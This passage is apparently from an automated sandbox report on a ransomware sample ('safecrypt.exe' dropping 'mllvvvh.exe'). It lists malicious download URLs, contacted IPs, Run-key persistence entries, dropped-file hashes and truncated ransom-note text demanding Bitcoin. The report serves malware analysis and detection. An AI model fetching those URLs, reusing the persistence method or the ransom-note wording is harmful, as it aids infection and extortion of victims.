                  http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%Smllvvvh.exe, 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://iicsdrd.com/mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://h5534bvnrnkj345.mamllvvvh.exetrue
                  • Avira URL Cloud: safe
                  unknown

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  185.53.178.54
                  educarpetas.comGermany
                  61969TEAMINTERNET-ASDEtrue
                  52.60.87.163
                  iicsdrd.comUnited States
                  16509AMAZON-02UStrue
                  176.74.179.58
                  bddadmin.desjardins.frUnited Kingdom
                  6640CENTURYLINK-TIER3-CLOUDUSfalse

                  General Information

                  Joe Sandbox Version:31.0.0 Emerald
                  Analysis ID:375304
                  Start date:24.03.2021
                  Start time:18:30:04
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 13m 29s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:safecrypt.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:30
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.rans.evad.winEXE@37/1004@6/3
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 38.1% (good quality ratio 33.4%)
                  • Quality average: 71.1%
                  • Quality standard deviation: 34.3%
                  HCA Information:
                  • Successful, ratio: 93%
                  • Number of executed functions: 309
                  • Number of non-executed functions: 43
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  Show All
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, VSSVC.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.147.198.201, 168.61.161.212, 52.255.188.83, 104.42.151.234, 23.0.174.200, 23.0.174.185, 40.88.32.150, 8.241.78.126, 8.241.88.254, 8.238.29.254, 8.241.90.254, 8.238.36.254, 95.100.54.203
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, 2-01-3cf7-0009.cdx.cedexis.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, a767.dspw65.akamai.net, wu-fg-shim.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, download.windowsupdate.com.edgesuite.net, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Report size getting too big, too many NtWriteFile calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  18:30:52API Interceptor1x Sleep call for process: safecrypt.exe modified
                  18:30:55API Interceptor4x Sleep call for process: mllvvvh.exe modified
                  18:30:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run gatert-12010 C:\Users\user\AppData\Roaming\mllvvvh.exe
                  18:31:05AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run gatert-12010 C:\Users\user\AppData\Roaming\mllvvvh.exe
                  18:31:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run gatert-12010 C:\Users\user\AppData\Roaming\mllvvvh.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  185.53.178.54Confirmation copy 112WSDGB.exeGet hashmaliciousBrowse
                  • www.creditoefectivo.info/3iw/?k2JLtP=m78xn5oMN8wnMfaX70UQPP8GL31woTtozaaF8RlJKmGfLr7wp/RwXdgcuT/KgNqIW69L&OZQliB=H0Dlqv
                  Quote111.exeGet hashmaliciousBrowse
                  • www.apowersof.com/r7m/
                  52.60.87.163AT113020.exeGet hashmaliciousBrowse
                  • www.makingdoathome.com/9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  AMAZON-02US6s2gbyAwJv.dllGet hashmaliciousBrowse
                  • 13.226.135.72
                  SqO6ag55Cu.dllGet hashmaliciousBrowse
                  • 13.226.135.72
                  HTX4QbkkW5.dllGet hashmaliciousBrowse
                  • 99.86.235.73
                  6de5c2db6203f30c772d1e60ab6626990b2bfaeaa8fab.dllGet hashmaliciousBrowse
                  • 99.86.235.73
                  88fd6304135a01b3ffefeb5bfd56d1825e8bf0af17bab.dllGet hashmaliciousBrowse
                  • 99.86.235.73
                  t3B6pf9U0v.dllGet hashmaliciousBrowse
                  • 99.86.235.73
                  cbcmgl1WO3.dllGet hashmaliciousBrowse
                  • 99.86.235.73
                  j0eSbvJyFm.dllGet hashmaliciousBrowse
                  • 99.86.235.73
                  Alil1csL8W.exeGet hashmaliciousBrowse
                  • 35.162.32.82
                  L6YM4wZLi6.dllGet hashmaliciousBrowse
                  • 99.86.235.73
                  AdobeFlashPlayer.dmgGet hashmaliciousBrowse
                  • 13.225.84.56
                  4pqE6xw7gB.dllGet hashmaliciousBrowse
                  • 99.86.235.73
                  khUkna8Ap7.dllGet hashmaliciousBrowse
                  • 13.224.91.73
                  j6mtcFU7eU.dllGet hashmaliciousBrowse
                  • 13.224.91.73
                  C7lC6n2qsw.dllGet hashmaliciousBrowse
                  • 13.224.91.73
                  rYU0sPmosv.dllGet hashmaliciousBrowse
                  • 13.224.91.73
                  cMXLZ1iO8P.dllGet hashmaliciousBrowse
                  • 13.224.91.73
                  x517ImFDrR.dllGet hashmaliciousBrowse
                  • 13.224.91.73
                  RIGBRZYVFT.dllGet hashmaliciousBrowse
                  • 13.224.91.73
                  3hLNe1VnYF.dllGet hashmaliciousBrowse
                  • 13.224.91.73
                  TEAMINTERNET-ASDERFQ HAN4323.exeGet hashmaliciousBrowse
                  • 185.53.177.11
                  Doc.exeGet hashmaliciousBrowse
                  • 185.53.178.14
                  payment slip_pdf.exeGet hashmaliciousBrowse
                  • 185.53.177.10
                  iQnbU4o7yx.exeGet hashmaliciousBrowse
                  • 185.53.179.28
                  requisition from ASTRO EXPRESS.xlsxGet hashmaliciousBrowse
                  • 185.53.177.10
                  inquiry 19117030P.xlsxGet hashmaliciousBrowse
                  • 185.53.177.14
                  HwL7D1UcZG.exeGet hashmaliciousBrowse
                  • 185.53.177.13
                  CREDIT NOTE DEBIT NOTE 30.1.2021.xlsxGet hashmaliciousBrowse
                  • 185.53.177.13
                  CiL08gVVjl.exeGet hashmaliciousBrowse
                  • 185.53.177.13
                  Mv Maersk Kleven V949E.xlsxGet hashmaliciousBrowse
                  • 185.53.177.13
                  Inquiry PR11020204168.xlsxGet hashmaliciousBrowse
                  • 185.53.177.13
                  PO210119.exe.exeGet hashmaliciousBrowse
                  • 185.53.178.53
                  payment advice002436_pdf.exeGet hashmaliciousBrowse
                  • 185.53.177.10
                  PDRgIfT71e.exeGet hashmaliciousBrowse
                  • 185.53.177.13
                  Payment Advice.xlsxGet hashmaliciousBrowse
                  • 185.53.177.13
                  payment advice00000789_pdf.exeGet hashmaliciousBrowse
                  • 185.53.177.10
                  Q52msELKeI.exeGet hashmaliciousBrowse
                  • 185.53.178.13
                  IMG-CMR.xlsxGet hashmaliciousBrowse
                  • 185.53.178.10
                  20210111140930669.exeGet hashmaliciousBrowse
                  • 185.53.178.13
                  http://itesoon.com/Get hashmaliciousBrowse
                  • 185.53.178.30

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\$Recycle.Bin\S-1-5-18\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7856
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:96:Pm1TQDl1ZAUmDrXtiEnqYEx/CWBTFtfb8FOC4AOOyHy+LQs:Ougzr9JkhTfb8ofVS+
                  MD5:436EE3253B8FBB7270B828285B8929C0
                  SHA1:21B592F63A512A94EBCD9E94B5E49573F94C8C3C
                  SHA-256:778408DA78F6082067F768BA7615DF5186409CA3EC57E6222E516AD97F641A61
                  SHA-512:B03A975CF7CF635DA9965DA8D179C6CED31538C9331555C9474514C34E8D7F229ACA3D7DC0DC137900994A4BF625DE5ABB1A42FA08E0F023D1D4BEDD67DD35A0
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\$Recycle.Bin\S-1-5-18\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):67752
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:1536:xgORxV4ZiQfHaRrVY+ERmwhTgjBe6RkRSb/Ev6OzwD/sO0ptYEIW7Rf5:xgs4ZxIYrTgjoikRSb2nHO0bb1T
                  MD5:14DDFCDD27213B85F966F8842DB39940
                  SHA1:BDDCB3114A568DD0AA8E0A643D6808ED312A74D2
                  SHA-256:613E2A374EC2C7FC5E170B63CF5B6F7189D897D986EDBA1AF76E6345E53C3CC2
                  SHA-512:32A5F3CF76A39C4F0E2CC6461FE3E276FB1ED4AA88CA52EE8CB465DA0D6CE89C2230E0AF2A3AF2F2180A46850B1E86F8EC17834BA32E76930453C83613F979A0
                  Malicious:true
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\$Recycle.Bin\S-1-5-18\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2097
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:48:seeeeeeeeKsR1I6SqgY7JZ8XVaVes+zdsqfQaGaBJj6BtJ7sOY:E1ItqgY1L3SoUj6Bti
                  MD5:A3A2FFE1C0FE27438871525A2732321A
                  SHA1:1569A82D5F2D2AEF8E2D3038D9B3F3D67B893CD1
                  SHA-256:A77B109B6B32EB45A2BDB8CB24EF7B61D042484DD6BEFB9CAE8845198AADCC23
                  SHA-512:59F5AF99D919C3CA239433413AF61081578D105ECCDDBECF98572D4D66DF270860E45D1090951CC3D2A5C84FF5F108A36617E4E8F3BA18836AD6E5352A601A6C
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7856
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:96:Pm1TQDl1ZAUmDrXtiEnqYEx/CWBTFtfb8FOC4AOOyHy+LQs:Ougzr9JkhTfb8ofVS+
                  MD5:436EE3253B8FBB7270B828285B8929C0
                  SHA1:21B592F63A512A94EBCD9E94B5E49573F94C8C3C
                  SHA-256:778408DA78F6082067F768BA7615DF5186409CA3EC57E6222E516AD97F641A61
                  SHA-512:B03A975CF7CF635DA9965DA8D179C6CED31538C9331555C9474514C34E8D7F229ACA3D7DC0DC137900994A4BF625DE5ABB1A42FA08E0F023D1D4BEDD67DD35A0
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):67752
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:1536:xgORxV4ZiQfHaRrVY+ERmwhTgjBe6RkRSb/Ev6OzwD/sO0ptYEIW7Rf5:xgs4ZxIYrTgjoikRSb2nHO0bb1T
                  MD5:14DDFCDD27213B85F966F8842DB39940
                  SHA1:BDDCB3114A568DD0AA8E0A643D6808ED312A74D2
                  SHA-256:613E2A374EC2C7FC5E170B63CF5B6F7189D897D986EDBA1AF76E6345E53C3CC2
                  SHA-512:32A5F3CF76A39C4F0E2CC6461FE3E276FB1ED4AA88CA52EE8CB465DA0D6CE89C2230E0AF2A3AF2F2180A46850B1E86F8EC17834BA32E76930453C83613F979A0
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2097
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:48:seeeeeeeeKsR1I6SqgY7JZ8XVaVes+zdsqfQaGaBJj6BtJ7sOY:E1ItqgY1L3SoUj6Bti
                  MD5:A3A2FFE1C0FE27438871525A2732321A
                  SHA1:1569A82D5F2D2AEF8E2D3038D9B3F3D67B893CD1
                  SHA-256:A77B109B6B32EB45A2BDB8CB24EF7B61D042484DD6BEFB9CAE8845198AADCC23
                  SHA-512:59F5AF99D919C3CA239433413AF61081578D105ECCDDBECF98572D4D66DF270860E45D1090951CC3D2A5C84FF5F108A36617E4E8F3BA18836AD6E5352A601A6C
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7856
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:96:Pm1TQDl1ZAUmDrXtiEnqYEx/CWBTFtfb8FOC4AOOyHy+LQs:Ougzr9JkhTfb8ofVS+
                  MD5:436EE3253B8FBB7270B828285B8929C0
                  SHA1:21B592F63A512A94EBCD9E94B5E49573F94C8C3C
                  SHA-256:778408DA78F6082067F768BA7615DF5186409CA3EC57E6222E516AD97F641A61
                  SHA-512:B03A975CF7CF635DA9965DA8D179C6CED31538C9331555C9474514C34E8D7F229ACA3D7DC0DC137900994A4BF625DE5ABB1A42FA08E0F023D1D4BEDD67DD35A0
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):67752
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:1536:xgORxV4ZiQfHaRrVY+ERmwhTgjBe6RkRSb/Ev6OzwD/sO0ptYEIW7Rf5:xgs4ZxIYrTgjoikRSb2nHO0bb1T
                  MD5:14DDFCDD27213B85F966F8842DB39940
                  SHA1:BDDCB3114A568DD0AA8E0A643D6808ED312A74D2
                  SHA-256:613E2A374EC2C7FC5E170B63CF5B6F7189D897D986EDBA1AF76E6345E53C3CC2
                  SHA-512:32A5F3CF76A39C4F0E2CC6461FE3E276FB1ED4AA88CA52EE8CB465DA0D6CE89C2230E0AF2A3AF2F2180A46850B1E86F8EC17834BA32E76930453C83613F979A0
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2097
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:48:seeeeeeeeKsR1I6SqgY7JZ8XVaVes+zdsqfQaGaBJj6BtJ7sOY:E1ItqgY1L3SoUj6Bti
                  MD5:A3A2FFE1C0FE27438871525A2732321A
                  SHA1:1569A82D5F2D2AEF8E2D3038D9B3F3D67B893CD1
                  SHA-256:A77B109B6B32EB45A2BDB8CB24EF7B61D042484DD6BEFB9CAE8845198AADCC23
                  SHA-512:59F5AF99D919C3CA239433413AF61081578D105ECCDDBECF98572D4D66DF270860E45D1090951CC3D2A5C84FF5F108A36617E4E8F3BA18836AD6E5352A601A6C
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7856
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:96:Pm1TQDl1ZAUmDrXtiEnqYEx/CWBTFtfb8FOC4AOOyHy+LQs:Ougzr9JkhTfb8ofVS+
                  MD5:436EE3253B8FBB7270B828285B8929C0
                  SHA1:21B592F63A512A94EBCD9E94B5E49573F94C8C3C
                  SHA-256:778408DA78F6082067F768BA7615DF5186409CA3EC57E6222E516AD97F641A61
                  SHA-512:B03A975CF7CF635DA9965DA8D179C6CED31538C9331555C9474514C34E8D7F229ACA3D7DC0DC137900994A4BF625DE5ABB1A42FA08E0F023D1D4BEDD67DD35A0
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):67752
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:1536:xgORxV4ZiQfHaRrVY+ERmwhTgjBe6RkRSb/Ev6OzwD/sO0ptYEIW7Rf5:xgs4ZxIYrTgjoikRSb2nHO0bb1T
                  MD5:14DDFCDD27213B85F966F8842DB39940
                  SHA1:BDDCB3114A568DD0AA8E0A643D6808ED312A74D2
                  SHA-256:613E2A374EC2C7FC5E170B63CF5B6F7189D897D986EDBA1AF76E6345E53C3CC2
                  SHA-512:32A5F3CF76A39C4F0E2CC6461FE3E276FB1ED4AA88CA52EE8CB465DA0D6CE89C2230E0AF2A3AF2F2180A46850B1E86F8EC17834BA32E76930453C83613F979A0
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2097
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:48:seeeeeeeeKsR1I6SqgY7JZ8XVaVes+zdsqfQaGaBJj6BtJ7sOY:E1ItqgY1L3SoUj6Bti
                  MD5:A3A2FFE1C0FE27438871525A2732321A
                  SHA1:1569A82D5F2D2AEF8E2D3038D9B3F3D67B893CD1
                  SHA-256:A77B109B6B32EB45A2BDB8CB24EF7B61D042484DD6BEFB9CAE8845198AADCC23
                  SHA-512:59F5AF99D919C3CA239433413AF61081578D105ECCDDBECF98572D4D66DF270860E45D1090951CC3D2A5C84FF5F108A36617E4E8F3BA18836AD6E5352A601A6C
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\$Recycle.Bin\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
